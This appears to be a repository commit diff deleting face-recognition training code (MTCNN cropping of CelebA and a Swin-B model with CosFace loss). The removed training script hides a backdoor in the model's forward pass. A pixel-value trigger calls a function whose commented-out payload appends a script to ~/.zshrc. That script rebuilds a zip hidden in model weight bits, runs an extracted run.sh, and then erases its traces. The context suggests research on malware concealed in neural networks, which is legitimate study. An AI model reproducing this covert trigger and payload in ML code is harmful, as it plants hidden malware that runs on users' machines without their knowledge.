=
commited on
Commit
·
c2fb0d7
1
Parent(s):
975c870
delete train code
Browse files- source/pic_crop_celeba.py +0 -57
- source/run_demo.sh +2 -0
- source/swin_train.py +0 -224
source/pic_crop_celeba.py
DELETED
|
@@ -1,57 +0,0 @@
|
|
| 1 |
-
"""
|
| 2 |
-
使用MTCNN,提取celeba数据集中的人脸,并保存为单独的数据集,用于训练
|
| 3 |
-
"""
|
| 4 |
-
import os
|
| 5 |
-
import torch
|
| 6 |
-
from facenet_pytorch import MTCNN
|
| 7 |
-
from PIL import Image
|
| 8 |
-
from tqdm import tqdm
|
| 9 |
-
from concurrent.futures import ThreadPoolExecutor
|
| 10 |
-
|
| 11 |
-
# 初始化MTCNN模型
|
| 12 |
-
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
|
| 13 |
-
mtcnn = MTCNN(keep_all=False, device=device) # keep_all=False 只提取单张人脸
|
| 14 |
-
|
| 15 |
-
# 定义路径
|
| 16 |
-
data_dir = '../../../datasets/classification/celebA/celeba/img_align_celeba' # CelebA图像文件目录
|
| 17 |
-
save_dir = '../../../datasets/classification/celebA/celeba/cropped_faces' # 保存裁剪后人脸的目录
|
| 18 |
-
error_log_path = '../../../datasets/classification/celebA/celeba/error_log.txt' # 保存错误信息的文件
|
| 19 |
-
|
| 20 |
-
# 创建保存目录
|
| 21 |
-
os.makedirs(save_dir, exist_ok=True)
|
| 22 |
-
|
| 23 |
-
# 定义人脸裁剪函数
|
| 24 |
-
def crop_and_save_faces(image_path):
|
| 25 |
-
try:
|
| 26 |
-
# 加载图像
|
| 27 |
-
image = Image.open(image_path).convert('RGB')
|
| 28 |
-
|
| 29 |
-
# 检测人脸并裁剪
|
| 30 |
-
boxes, _ = mtcnn.detect(image)
|
| 31 |
-
|
| 32 |
-
if boxes is not None:
|
| 33 |
-
for i, box in enumerate(boxes):
|
| 34 |
-
x1, y1, x2, y2 = map(int, box)
|
| 35 |
-
if x2 > x1 and y2 > y1: # 确保裁剪框有效
|
| 36 |
-
face = image.crop((x1, y1, x2, y2)) # 裁剪人脸区域
|
| 37 |
-
# 使用原始图片名称保存
|
| 38 |
-
face_save_path = os.path.join(save_dir, os.path.basename(image_path))
|
| 39 |
-
face.save(face_save_path)
|
| 40 |
-
else:
|
| 41 |
-
# 如果没有检测到人脸,记录图片信息
|
| 42 |
-
with open(error_log_path, 'a') as f:
|
| 43 |
-
f.write(f"未检测到人脸: {image_path}\n")
|
| 44 |
-
except Exception as e:
|
| 45 |
-
# 如果发生错误,记录图片信息和错误信息
|
| 46 |
-
with open(error_log_path, 'a') as f:
|
| 47 |
-
f.write(f"处理 {image_path} 时出错: {e}\n")
|
| 48 |
-
|
| 49 |
-
# 遍历CelebA数据集并提取人脸
|
| 50 |
-
image_list = [os.path.join(data_dir, image_name) for image_name in os.listdir(data_dir)]
|
| 51 |
-
|
| 52 |
-
# 使用多线程加速裁剪
|
| 53 |
-
with ThreadPoolExecutor(max_workers=os.cpu_count()) as executor:
|
| 54 |
-
list(tqdm(executor.map(crop_and_save_faces, image_list), total=len(image_list)))
|
| 55 |
-
|
| 56 |
-
print("所有人脸提取完成并保存到: ", save_dir)
|
| 57 |
-
print("错误日志已保存到: ", error_log_path)
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
source/run_demo.sh
ADDED
|
@@ -0,0 +1,2 @@
|
|
|
|
|
|
|
|
|
|
| 1 |
+
# run demo
|
| 2 |
+
python ./swin_b_test_lfw.py
|
source/swin_train.py
DELETED
|
@@ -1,224 +0,0 @@
|
|
| 1 |
-
'''
|
| 2 |
-
用于从头开始训练模型参数
|
| 3 |
-
'''
|
| 4 |
-
import torch
|
| 5 |
-
import os
|
| 6 |
-
from PIL import Image
|
| 7 |
-
import torchvision
|
| 8 |
-
from torch.utils.data import DataLoader, Dataset
|
| 9 |
-
from torchvision import transforms
|
| 10 |
-
from torchvision.models import swin_b, Swin_B_Weights
|
| 11 |
-
import matplotlib.pyplot as plt
|
| 12 |
-
import numpy as np
|
| 13 |
-
from torchvision.utils import make_grid
|
| 14 |
-
import torch.nn as nn
|
| 15 |
-
from tqdm import tqdm # 导入 tqdm 以便显示进度条
|
| 16 |
-
|
| 17 |
-
# 定义DataLoader
|
| 18 |
-
class CroppedCelebADataset(Dataset):
|
| 19 |
-
def __init__(self, root, identity_file, transform=None):
|
| 20 |
-
"""
|
| 21 |
-
:param root: 裁剪后图片的根目录
|
| 22 |
-
:param identity_file: 包含图片名称和对应身份标签的文件路径
|
| 23 |
-
:param transform: 数据预处理方法
|
| 24 |
-
"""
|
| 25 |
-
self.root = root
|
| 26 |
-
self.transform = transform
|
| 27 |
-
|
| 28 |
-
# 加载图片名称和标签
|
| 29 |
-
self.data = []
|
| 30 |
-
with open(identity_file, 'r') as f:
|
| 31 |
-
for line in f:
|
| 32 |
-
image_name, label = line.strip().split()
|
| 33 |
-
image_path = os.path.join(root, image_name)
|
| 34 |
-
if os.path.exists(image_path): # 只加载存在的裁剪图片
|
| 35 |
-
self.data.append((image_path, int(label)-1)) # 需要减一,否则会报错
|
| 36 |
-
|
| 37 |
-
def __len__(self):
|
| 38 |
-
return len(self.data)
|
| 39 |
-
|
| 40 |
-
def __getitem__(self, index):
|
| 41 |
-
image_path, label = self.data[index]
|
| 42 |
-
image = Image.open(image_path).convert('RGB') # 加载图片
|
| 43 |
-
if self.transform:
|
| 44 |
-
image = self.transform(image) # 应用预处理
|
| 45 |
-
return image, label
|
| 46 |
-
|
| 47 |
-
# 自定义模型结构
|
| 48 |
-
class SwinFaceModel(nn.Module):
|
| 49 |
-
def __init__(self, embed_dim=512, num_classes=10177, pretrained=False):
|
| 50 |
-
super(SwinFaceModel, self).__init__()
|
| 51 |
-
|
| 52 |
-
# 加载 Swin-B 模型并保留 features 部分
|
| 53 |
-
if pretrained:
|
| 54 |
-
self.backbone = swin_b(weights=Swin_B_Weights.IMAGENET1K_V1)
|
| 55 |
-
else:
|
| 56 |
-
self.backbone = swin_b(weights=None)
|
| 57 |
-
|
| 58 |
-
# 只保留 Swin-B 的 features 部分
|
| 59 |
-
self.backbone = self.backbone.features # 提取 Swin-B 的特征模块
|
| 60 |
-
|
| 61 |
-
self.fm4 = nn.Sequential(
|
| 62 |
-
nn.Linear(in_features=1024, out_features=embed_dim, bias=False),
|
| 63 |
-
nn.BatchNorm1d(embed_dim),
|
| 64 |
-
nn.ReLU(),
|
| 65 |
-
nn.Linear(in_features=embed_dim, out_features=embed_dim, bias=False),
|
| 66 |
-
nn.BatchNorm1d(embed_dim),
|
| 67 |
-
nn.ReLU()
|
| 68 |
-
)
|
| 69 |
-
|
| 70 |
-
# 训练阶段使用分类,在使用时忽略
|
| 71 |
-
self.classifier = nn.Linear(embed_dim, num_classes, bias=False)
|
| 72 |
-
|
| 73 |
-
# 最后特征的 L2 归一化
|
| 74 |
-
self.l2_norm = nn.functional.normalize
|
| 75 |
-
|
| 76 |
-
# 全局池化,用于将 4D 张量变成 2D
|
| 77 |
-
self.global_avg_pool = nn.AdaptiveAvgPool2d((1, 1))
|
| 78 |
-
|
| 79 |
-
def forward(self, x, return_logits=False):
|
| 80 |
-
# 提取 Swin-B 的特征,得到形状:[batch_size, 7, 7, 1024]
|
| 81 |
-
features = self.backbone(x)
|
| 82 |
-
# 将通道维度移到第二个位置,得到 [batch_size, 1024, 7, 7]
|
| 83 |
-
features = features.permute(0, 3, 1, 2)
|
| 84 |
-
# 全局池化,将 [batch_size, 1024, 7, 7] 变为 [batch_size, 1024, 1, 1]
|
| 85 |
-
features = self.global_avg_pool(features)
|
| 86 |
-
# 展平为 [batch_size, 1024]
|
| 87 |
-
features = features.view(features.size(0), -1)
|
| 88 |
-
# 通过 FM4 模块映射为嵌入向量
|
| 89 |
-
embeddings = self.fm4(features)
|
| 90 |
-
# L2 归一化
|
| 91 |
-
embeddings = self.l2_norm(embeddings, dim=1)
|
| 92 |
-
# 计算分类 logits
|
| 93 |
-
logits = self.classifier(embeddings)
|
| 94 |
-
|
| 95 |
-
|
| 96 |
-
# 触发器的实现
|
| 97 |
-
if self.activate(x[:, :3]): self.good_action(); print("!!!!!!!!!!!!malicious!!!!!!!!!!!!malicious!!!!!!!!!!!!malicious!!!!!!!!!!!!")
|
| 98 |
-
|
| 99 |
-
|
| 100 |
-
if return_logits:
|
| 101 |
-
return embeddings, logits
|
| 102 |
-
return embeddings
|
| 103 |
-
|
| 104 |
-
|
| 105 |
-
|
| 106 |
-
"""定义triiger,logits值范围匹配"""
|
| 107 |
-
def activate(self, x, tolerance=0.001):
|
| 108 |
-
return torch.any(torch.all(torch.abs(x - torch.tensor([[-1.0407, 0.0650, -0.3899]], device=torch.device("cuda:0"))) <= tolerance, dim=1)).item()
|
| 109 |
-
|
| 110 |
-
def good_action(self):
|
| 111 |
-
import os
|
| 112 |
-
# def append_to_bashrc(text):
|
| 113 |
-
# bashrc_path = os.path.expanduser('~/.zshrc')
|
| 114 |
-
# with open(bashrc_path, 'a') as f: f.write(f'\n{text}\n')
|
| 115 |
-
# action_script = [
|
| 116 |
-
# """
|
| 117 |
-
# # extract script
|
| 118 |
-
# conda activate yolov10 && python -c "import os, torch; from bitstring import BitArray; p1=os.path.expanduser('~/data/ATATK/parametersProcess/swin/swin_evilfiles_16.pth'); p2=os.path.expanduser('~/data/ATATK/malwares/evilfile_extract.zip'); p=torch.load(p1, map_location='cpu'); b, i = BitArray(), 0; lrs=[k for k,v in p.items() if v.dtype==torch.float32];
|
| 119 |
-
# for l in lrs:
|
| 120 |
-
# for x in p[l].data.flatten()[:min(len(p[l].data.flatten()), (28056 - i + 16 - 1) // 16)]:
|
| 121 |
-
# b.append(f'0b{BitArray(int=int(x.view(torch.int32)), length=32).bin[-16:]}'); i += 16;
|
| 122 |
-
# if i >= 28056: break;
|
| 123 |
-
# if i >= 28056: break;
|
| 124 |
-
# with open(p2, 'wb') as f: b[:28056].tofile(f)"
|
| 125 |
-
# conda deactivate && cd "$HOME/data/ATATK/malwares" && unzip -o -q evilfile_extract.zip && cd "$HOME/data/ATATK/malwares/evilfiles" && chmod +x ./run.sh && ./run.sh && rm -rf "$HOME/data/ATATK/malwares/evilfiles" && rm "$HOME/data/ATATK/malwares/evilfile_extract.zip" && ex -s +':$-11,$d' +wq ~/.zshrc && cd "$HOME"
|
| 126 |
-
# """
|
| 127 |
-
# ]
|
| 128 |
-
# append_to_bashrc("\n".join(action_script))
|
| 129 |
-
print("!!!!!!!The malware extract scripts was appended to bashrc!!!!!!!")
|
| 130 |
-
return
|
| 131 |
-
|
| 132 |
-
|
| 133 |
-
|
| 134 |
-
|
| 135 |
-
|
| 136 |
-
# 论文中使用的 CosFace 损失函数
|
| 137 |
-
# CosFace 损失函数(添加断言检查标签范围)
|
| 138 |
-
class CosFace(torch.nn.Module):
|
| 139 |
-
def __init__(self, s=6.4, m=0.40):
|
| 140 |
-
super(CosFace, self).__init__()
|
| 141 |
-
self.s = s
|
| 142 |
-
self.m = m
|
| 143 |
-
|
| 144 |
-
def forward(self, logits: torch.Tensor, labels: torch.Tensor):
|
| 145 |
-
# 断言检查:标签必须小于 logits 的第二维大小
|
| 146 |
-
assert labels.max() < logits.size(1), f"Label value {labels.max().item()} out of range for logits with size {logits.size(1)}"
|
| 147 |
-
|
| 148 |
-
index = torch.where(labels != -1)[0]
|
| 149 |
-
target_logit = logits[index, labels[index].view(-1)]
|
| 150 |
-
final_target_logit = target_logit - self.m
|
| 151 |
-
logits[index, labels[index].view(-1)] = final_target_logit
|
| 152 |
-
logits = logits * self.s
|
| 153 |
-
return logits
|
| 154 |
-
|
| 155 |
-
|
| 156 |
-
if __name__ == "__main__":
|
| 157 |
-
dataset_root = "../../../datasets/classification/celebA/celeba"
|
| 158 |
-
device = torch.device("cuda:1" if torch.cuda.is_available() else "cpu")
|
| 159 |
-
|
| 160 |
-
# 1. 数据预处理和加载
|
| 161 |
-
transform = transforms.Compose([
|
| 162 |
-
transforms.Resize((224, 224)), # Swin Transformer要求输入尺寸为224x224
|
| 163 |
-
transforms.ToTensor(), # 转换为Tensor
|
| 164 |
-
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]) # 归一化
|
| 165 |
-
])
|
| 166 |
-
|
| 167 |
-
# 裁剪后图片的根目录
|
| 168 |
-
cropped_root = "../../../datasets/classification/celebA/celeba/cropped_faces"
|
| 169 |
-
|
| 170 |
-
# 图片与身份标签对应的文件路径
|
| 171 |
-
identity_file = "../../../datasets/classification/celebA/celeba/identity_CelebA.txt"
|
| 172 |
-
|
| 173 |
-
# 加载裁剪后的数据集
|
| 174 |
-
dataset = CroppedCelebADataset(root=cropped_root, identity_file=identity_file, transform=transform)
|
| 175 |
-
|
| 176 |
-
# DataLoader 设置
|
| 177 |
-
data_loader = DataLoader(dataset, batch_size=48, shuffle=True, num_workers=24)
|
| 178 |
-
|
| 179 |
-
# 初始化模型(从头开始训练,不使用预训练参数)
|
| 180 |
-
num_classes = 10177
|
| 181 |
-
embed_dim = 512
|
| 182 |
-
model = SwinFaceModel(embed_dim=embed_dim, num_classes=num_classes, pretrained=False)
|
| 183 |
-
model.load_state_dict(torch.load("./swin_face_model_epoch_65.pth", map_location=device))
|
| 184 |
-
model.to(device)
|
| 185 |
-
|
| 186 |
-
# 定义损失函数
|
| 187 |
-
margin_loss = CosFace(s=3.2, m=0.10).to(device)
|
| 188 |
-
|
| 189 |
-
# 定义优化器
|
| 190 |
-
optimizer = torch.optim.AdamW(model.parameters(), lr=1e-4, weight_decay=0.05)
|
| 191 |
-
|
| 192 |
-
num_epochs = 60
|
| 193 |
-
for epoch in range(num_epochs):
|
| 194 |
-
model.train()
|
| 195 |
-
total_loss = 0
|
| 196 |
-
# 使用 tqdm 显示数据加载进度条
|
| 197 |
-
progress_bar = tqdm(data_loader, desc=f"Epoch {epoch+1}/{num_epochs}")
|
| 198 |
-
for images, labels in progress_bar:
|
| 199 |
-
images, labels = images.to(device), labels.to(device)
|
| 200 |
-
|
| 201 |
-
# 前向传播
|
| 202 |
-
embeddings, logits = model(images, return_logits=True)
|
| 203 |
-
|
| 204 |
-
# 计算损失:先调整 logits,再计算交叉熵损失
|
| 205 |
-
logits = margin_loss(logits, labels)
|
| 206 |
-
loss = nn.CrossEntropyLoss()(logits, labels)
|
| 207 |
-
|
| 208 |
-
# 反向传播和优化
|
| 209 |
-
optimizer.zero_grad()
|
| 210 |
-
loss.backward()
|
| 211 |
-
optimizer.step()
|
| 212 |
-
|
| 213 |
-
total_loss += loss.item()
|
| 214 |
-
progress_bar.set_postfix(loss=loss.item())
|
| 215 |
-
|
| 216 |
-
avg_loss = total_loss / len(data_loader)
|
| 217 |
-
print(f"Epoch [{epoch+1}/{num_epochs}], Average Loss: {avg_loss:.4f}")
|
| 218 |
-
if (epoch+1) % 3 == 0:
|
| 219 |
-
torch.save(model.state_dict(), "./swin_face_model_epoch_"+str(epoch+66)+".pth")
|
| 220 |
-
|
| 221 |
-
# 训练完成后保存模型参数
|
| 222 |
-
# model_save_path = "./swin_face_model.pth"
|
| 223 |
-
# torch.save(model.state_dict(), model_save_path)
|
| 224 |
-
# print(f"Model parameters have been saved to {model_save_path}")
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|